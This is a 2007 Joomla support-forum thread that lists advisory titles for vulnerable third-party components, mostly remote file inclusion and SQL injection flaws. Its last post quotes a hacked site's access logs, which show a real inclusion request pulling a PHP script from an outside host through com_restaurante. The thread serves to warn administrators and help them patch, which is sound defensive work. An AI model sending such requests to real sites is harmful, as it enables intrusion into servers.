Change font size Change Width
Advanced Search
 

Joomla! Discussion Forums



It is currently Wed Nov 25, 2009 6:24 am (All times are UTC )

 

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x » 3rd Party/Non Joomla! Security Issues



Post new topic Reply to topic  Page 1 of 1
  [ 6 posts ] 
  Print view Previous topic | Next topic 
Author Message
gustavo
Posted: Sun Sep 23, 2007 4:08 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
2007-10-10 - Joomla Component JContentSubscription 1.5.8  - Remote File Inclusion Vulnerability
2007-10-10 - Joomla Component MP3 Allopass 1.0  - Remote File Inclusion Vulnerability
2007-10-08 - Joomla component MOSMediaLite451 -  Remote File Inclusion Vulnerability
2007-10-07 - Joomla Component wmtportfolio 1.0 -  Remote File Inclusion Vulnerability
2007-10-07 - Joomla Flash Image Gallery Component -  Remote File Inclusion Vulnerability
2007-10-06 - Joomla panoramic component 1.0 -  Remote File Inclusion Vulnerability
2007-09-21 - Joomla Component com_slideshow  -  Remote File Inclusion Vulnerability
2007-09-16 - Joomla Component joom12Pic 1.0  -  Remote File Inclusion Vulnerability
2007-09-15 - Joomla Component Flash Fun! 1.0 -  Remote File Inclusion Vulnerability
2007-09-13 - Joomla Component joomlaradio v5 -  Remote File Inclusion Vulnerability
2007-09-08 - Joomla Component Restaurante -  Remote File Upload Vulnerability
2007-09-01 - Joomla! 1.5 Beta1/Beta2/RC1 -  Remote SQL Injection Exploit
2007-08-23 - Joomla Component BibTeX <= 1.3 -  Remote Blind SQL Injection Exploit
2007-08-23 - Joomla Component EventList <= 0.8 (did)  -  SQL Injection Vulnerability
2007-08-23 - Joomla Component Nice Talk <= 0.9.3 (tagid)  -  SQL Injection Vulnerability
2007-08-23 - Joomla Component RSfiles <= 1.0.2 (path)  -  File Download Vulnerability
2007-08-23 - Joomla Component NeoRecruit <= 1.4 (id)  -  SQL Injection Vulnerability
2007-07-31 - Joomla Component com_gmaps 1.00 (mapId)  -  Remote SQL Injection
2007-07-22 - Joomla! CMS 1.5 beta 2 (search)  -  Remote Code Execution Vulnerability
2007-07-19 - Joomla Component Pony Gallery <= 1.5  -  SQL Injection Vulnerability
2007-07-18 - Joomla Component Expose <= RC35  -  Remote File Upload Vulnerability
2007-05-28 - Joomla Component Phil-a-Form <= 1.2.0.0  -  SQL Injection Exploit
2007-04-23 - Joomla 1.5.0 Beta (pcltar.php)  -  Remote File Inclusion Vulnerability
2007-04-17 - Joomla Template Be2004-2 (index.php)  - Remote File Inclusion Vulnerability
2007-04-17 - Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) - Remote File Inclusion Vulnerability
2007-04-14 - Mambo/Joomla Component Article 1.1 -  Remote File Include Exploit 
2007-04-14 - Joomla Module AutoStand 1.0 R - Remote File Inclusion Vulnerability
2007-04-11 - Joomla Component mosMedia <= 1.0.8 - Remote File Inclusion Vulnerability
2007-04-10 - Joomla/Mambo Component Taskhopper 1.1 -  Remote File Include Exploit
2007-03-27 - Joomla Component D4JeZine <= 2.8 -  Remote BLIND SQL Injection Exploit
2007-03-24 - Joomla Component RWCards <= 2.4.3 -  Remote SQL Injection Exploit
2007-03-24 - Joomla Component Car Manager <= 1.1 -  Remote SQL Injection Exploit
2007-03-23 - Joomla Component Joomlaboard 1.1.1 (sbp) - Remote File Inclusion Vulnerability
2007-03-23 - Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion Vulnerability
2006-11-17 - MosReporter Joomla Component 0.9.3 - Remote File Inclusion Vulnerability
2006-08-19 - Joomla <=1.0.10 (poll component) - Arbitrary Add Votes Exploit
2006-08-18 - Joomla Kochsuite Component <= 0.9.4 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Link Directory Component <= 1.0.3 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Artlinks Component <= 1.0b4 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla Mosets Tree <= 1.0 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla com_jim Component <= 1.0.1 - Remote File Inclusion Vulnerability
2006-08-13 - Joomla Webring Component <= 1.0 - Remote File Inclusion Vulnerability
2006-08-07 - Joomla JD-Wiki Component <= 1.0.2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla LMO Component <= 1.0b2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla com_bayesiannaivefilter Component <= 1.1 - Remote File Inclusion Vulnerability
2006-06-17 - Joomla <= 1.0.9 (Weblinks) - Remote Blind SQL Injection Exploit
2006-04-19 - Mambo <= 4.5.3 , Joomla <=1.0.7 (feed) -  Denial of Service Exploit


*RFI: Remote File Inclusion

_________________
Comunidad Joomla!: Member of the Spanish [es_ES] Joomla Translation Team | http://comunidadjoomla.org

NUEVO! Manual de instalación para Joomla! 1.5.x - Guía de inicio Joomla! 1.5.X en http://joomlacode.org/gf/project/comunidadjoomla/frs/

Last edited by gustavo on Thu Oct 11, 2007 2:37 pm, edited 1 time in total.

Top
   
 
gustavo
Posted: Sat Oct 06, 2007 6:42 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
Add: 2007-10-06 Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability

Component : Joomla panoramic component -  version 1.0
site: webmaster-tips.net/panoramic-picture-viewer.html

_________________
Comunidad Joomla!: Member of the Spanish [es_ES] Joomla Translation Team | http://comunidadjoomla.org

NUEVO! Manual de instalación para Joomla! 1.5.x - Guía de inicio Joomla! 1.5.X en http://joomlacode.org/gf/project/comunidadjoomla/frs/

Last edited by gustavo on Sat Oct 06, 2007 6:49 pm, edited 1 time in total.

Top
   
 
K1u
Posted: Sat Oct 06, 2007 7:01 pm 
User avatar
Joomla! Intern
Joomla! Intern
Offline

Joined: Fri Sep 07, 2007 9:47 pm
Posts: 57
It is always great to see the vulns so you may patch them yourself  :P

_________________
k0h.org - Security and Programming community.
Proudly powered by Joomla.

Top
  E-mail  
 
gustavo
Posted: Tue Oct 09, 2007 3:42 am 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
add 2007-10-08 - Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability
Component : MOSMediaLite451
site: djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/

add 2007-10-07 - Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability
Component : WMT Portfolio -  version 1.0
site: webmaster-tips.net/wmt-joomla-component-portfolio.html

add 2007-10-07 - Joomla Flash Image Gallery Component Remote File Inclusion Vulnerability
Component : Flash Image Gallery
site: webmaster-tips.net/flash-image-gallery.html

_________________
Comunidad Joomla!: Member of the Spanish [es_ES] Joomla Translation Team | http://comunidadjoomla.org

NUEVO! Manual de instalación para Joomla! 1.5.x - Guía de inicio Joomla! 1.5.X en http://joomlacode.org/gf/project/comunidadjoomla/frs/

Last edited by gustavo on Thu Oct 11, 2007 2:32 pm, edited 1 time in total.

Top
   
 
gustavo
Posted: Thu Oct 11, 2007 2:30 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
add 2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability 
Component : JContentSubscription
site: joomlaequipment.com/index.php?option=com_content&task=view&id=7&Itemid=34

add 2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability 
Component : JContentSubscription
site: joomlaratings.com

_________________
Comunidad Joomla!: Member of the Spanish [es_ES] Joomla Translation Team | http://comunidadjoomla.org

NUEVO! Manual de instalación para Joomla! 1.5.x - Guía de inicio Joomla! 1.5.X en http://joomlacode.org/gf/project/comunidadjoomla/frs/

Last edited by gustavo on Thu Oct 11, 2007 2:38 pm, edited 1 time in total.

Top
   
 
Xirtam
Posted: Wed Nov 14, 2007 12:46 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Sat Aug 20, 2005 5:33 pm
Posts: 275
Location: Assen - The Netherlands
Are you sure that joomlaradio v4 is OK?

My site is suspended because it is someway hacked.
I found this in the logs:

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:01 +0100] "GET //index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 724 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:34 +0100] "GET /index.php/weblinks/Joomla//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 404 5938 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"

Quote:
213.173.251.138 - - [13/Nov/2007:00:28:18 +0100] "GET /index.php//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 12748 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"


I am not using the com_restaurante component, never heard of it.

_________________
_/ _/ _/ Xirtam
_/ _/ _/ http://www.wittebal.nl
_/ _/ _/ Best musiccafé in Assen

Top
  E-mail  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 6 posts ] 

Quick reply

 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x » 3rd Party/Non Joomla! Security Issues

Who is online

Users browsing this forum: No registered users and 0 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
 
 
 
 
 

© 2005-2009 Open Source Matters, Inc. All rights reserved. Joomla hosting by Rochen Ltd.